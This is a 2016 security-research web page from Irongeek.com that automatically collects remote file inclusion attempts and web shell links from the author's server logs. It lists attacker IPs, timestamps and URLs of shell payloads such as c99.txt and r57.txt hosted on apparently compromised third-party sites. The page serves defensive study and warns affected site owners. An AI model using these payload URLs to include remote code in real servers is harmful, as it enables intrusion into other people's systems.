A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Affiliates:
Social-engineer-training Button
Irongeek Button

Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle


Web Shells and RFIs Collection

Web Shells and RFIs Collection

      I wrote a little script to periodically look through my web logs for unique RFIs and Web Shells, and then collect them on one page where I can go look at them or download them to add to my Web Shell library. Many of these attacks are repeated multiple time, so I ignore the time fields in judging if an RFI/Web Shell is unique. I've coded it to weed out links to Web Shells that 404. I also use nofollow and a referrer hiding service so it does not look like I'm attacking anyone with the web shells (but the check for 404 sort of looks suspicious). This page will also let you link off to defense.ballastsecurity.net where you can use their PHP decoder to look at the obfuscated code. Enjoy my Web Shell zoo, it should update itself every hour or so. If you see your domain on the list of websites hosting Web Shells you are likely pwned and should clean up your server.

Source code that generates this page

Filtered For More Likely Live Webshell RFIs

AttackerWhois IPRequest
(Truncated if over 60 chr for display, link should still work)
View on PHP DecoderAgentRefererTimeBackup
124.107.39.195Whoishttp://www.w0rms.com/shell/cihshell.txtView on PHP DecoderMozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36-27/Jun/2016:18:35:28 -0700Archived Webshell
187.40.71.203Whoishttp://www.parcours-artistes-chaudfontaine-sprimont-trooz.beView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-27/Jun/2016:13:50:21 -0700Archived Webshell

Likely Dead Links

AttackerWhois IPRequest
(Truncated if over 60 chr for display, link should still work)
View on PHP DecoderAgentRefererTimeBackup
187.79.4.150Whoishttp://www.parcours-artistes-chaudfontaine-sprimont-trooz.beView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-01/Jun/2016:06:19:24 -0700Archived Webshell
189.49.187.138Whoishttp://www.ceap.br/Folder_Baru/ds.txt?r&=id&&View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-23/Jun/2016:08:09:56 -0700Archived Webshell
52.38.114.22Whoishttp://doa.go.th/ard/images/2016.txt?View on PHP Decoder--21/Jun/2016:14:18:47 -0700Archived Webshell
136.243.95.184Whoishttp://www.protecciondebalcones.com/site/wp-includes/images/View on PHP DecoderMozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html-15/Jun/2016:22:52:10 -0700Archived Webshell
186.227.186.72Whoishttp://www.boemieditore.com/media/stalker/icons/black/rfienvView on PHP Decoder--07/Jun/2016:03:48:40 -0700Archived Webshell
200.98.201.251Whoishttp://advancedcorretora.com.br/corretora/testevull.txt?View on PHP Decoder--25/May/2016:05:28:26 -0700Archived Webshell
177.14.240.150Whoishttp://blogdosuccar.com.br/xxx1/cmd.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-07/Jun/2016:14:12:13 -0700Archived Webshell
200.98.201.251Whoishttp://acanetaroyal.com.br/testevull.txt?View on PHP Decoder--18/Jun/2016:18:56:26 -0700Archived Webshell
177.14.240.150Whoishttp://ikasaweb.com.br/plugin/mail/..txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-10/Jun/2016:06:10:47 -0700Archived Webshell
177.14.240.150Whoishttp://www.freightcubesystems.com.au/opa.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-30/May/2016:15:15:41 -0700Archived Webshell
177.14.240.150Whoishttp://www.freightcubesystems.com.au/opa.txtView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-30/May/2016:08:09:07 -0700Archived Webshell
187.79.11.120Whoishttp://www.ceap.br/Folder_Baru/ds.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-03/Jun/2016:03:26:09 -0700Archived Webshell
200.98.201.251Whoishttp://www.mylovelybeads.com/contest/testevull.txt?View on PHP Decoder--09/Jun/2016:03:49:28 -0700Archived Webshell
187.41.251.68Whoishttp://www.hidayah.edu.my/plugins/zeno.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-01/Jun/2016:19:58:14 -0700Archived Webshell
187.56.81.192Whoishttp://www.hccindia.com/up.txt?View on PHP Decoder--05/Jun/2016:01:12:14 -0700Archived Webshell
187.79.7.254Whoishttp://www".parcours-artistes-chaudfontaine-sprimont-trView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-02/Jun/2016:12:21:28 -0700Not In Archive
79.44.23.18Whoishttp://beedar.com/c99.txtView on PHP DecoderMozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4-01/Jun/2016:06:57:34 -0700Not In Archive
177.14.240.158Whoishttp://ndahijab.com/r57.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-30/May/2016:19:25:18 -0700Archived Webshell
186.227.186.70Whoishttp://www.mrcerimonialeventos.com.br/plugins/system/RfiEmaiView on PHP Decoder--24/May/2016:23:57:09 -0700Archived Webshell

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2016, IronGeek
Louisville / Kentuckiana Information Security Enthusiast